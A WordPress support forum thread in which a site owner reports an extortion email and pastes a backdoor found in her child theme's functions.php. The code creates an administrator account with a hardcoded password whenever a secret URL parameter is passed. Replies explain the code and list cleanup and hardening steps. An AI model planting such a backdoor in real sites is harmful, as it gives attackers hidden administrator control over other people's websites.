Potential database hacking

  • Hello,

    On Saturday morning we received an email saying that our database has been compromised, and threatening to sell it to the highest bidder etc.

    I would normally think that this is some kind of hoax, except for the fact that last week there was an error on the website where the website would not load and there was an error message saying that there was an error in the database – there was a link to repair database tables. (Does this sometimes happen with WordPress?)

    It makes me wonder if maybe the link to repairing database tables was a hack, or if the error itself was due to the hackers gaining access to our database.

    Do you think this could be possible?

    This morning when I was alerted to this email I started scanning our site for Malware and found the following code in our child theme functions.php – which seems to be a hack

    add_action('init', 'hjklmopn');
        
function hjklmopn() {
if ( isset( $_GET['doomwpl'] ) ) {
$userdata = array(
    'user_login' => $_GET['doomwpl'],
    'user_url'   => 'joinme.com',
    'user_pass'  => 'doomwp',
    'role'       => 'administrator'
);
$user_id  = wp_insert_user( $userdata );
if ( !is_wp_error( $user_id ) ) {
    var_dump($userdata, $user_id);
}
die();
}
}

    I thought that it sounds like it has retrieved role and password information from users of the website – but do you think it is just administrator accounts?

    Thanks for your help.

    As I am not fluent in PHP I am not sure what the malicious code has instructed the website to do.

    The rest of our scanners show that there is no additional malware on the site, and it seems that there was a vulnerability in our theme builder, so perhaps that is how they got into functions.php

    Do you think there are any other ways they could have gotten access to functions.php?

    Thanks so much!
    Sarah

    • This topic was modified 2 years, 1 month ago by Jan Dembowski. Reason: Moved to Fixing WordPress, this is not an Developing with WordPress topic
Viewing 4 replies - 1 through 4 (of 4 total)

  • Hi,
    Maybe the hacker has used an outdated plugin venerability to get access to a function file so that the hacker can add a code to create a new user and assign a role as admin, so remove the code and ask your hosting provider to scan the server, their many time’s cases that when you are on shared hosting your site can be hacked.

    Try to Keep Up to date with your plugin themes and WordPress version and reset the database password and update it in a wp-config.php file also check in the database if there is any unauthorized user is created if it is then remove it or move your files and database to the cloud because cloud hosting like RDS on AWS provide database encryption and many other provides it

    And don’t forget to take the backup of website files and database on weekly bases and use a security plugin as well

    Thread Starter sarahjsouris

    (@sarahjsouris)

    Hello @dineshpilani05 !

    Thanks so much for your reply. I appreciate your help.

    Could you please confirm that the code I posted above would be used to insert a user into wp-admin, and not to generate a list of all our users’ data?

    Do you think that it is possible that this user is hidden? Although I checked the database this afternoon – they have not been added as a user in the database.

    I have updated all the plugins, themes etc. I will definitely stay on top of it!

    And we do regular backups.

    Thanks so much!
    Sarah

    This code simply inserts the user into the wp_users table with the name doomwpl and assign it an admin role, As the user cannot be hidden but you should remove this code because if there is a user present in the table of the database and remove it, it will automatically create when the website will load so it’s better to remove the user. because
    the hook init runs after WordPress has finished loading but before any headers are sent.

    Could you please confirm that the code I posted above would be used to insert a user into wp-admin, and not to generate a list of all our users’ data?

    Is there a valid reason why this code might have been inserted into the child theme?

    If not:

    – change all passwords for strong random ones (WP dashboard, cPanel, database)
    – change the salt keys in wp-config.php to log out all users
    – audit your plugins for those that are no longer maintained and receiving updates
    – scan the site with the Wordfence and GOTMLS security plugins
    – install a security plugin (e.g. NinjaFirewall) that can email a notification when a new user is created/pluginor theme uploaded/user logs in etc
    – take regular off-site backups

    • This reply was modified 2 years, 1 month ago by barnez. Reason: OP already takes regular backups
Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Potential database hacking’ is closed to new replies.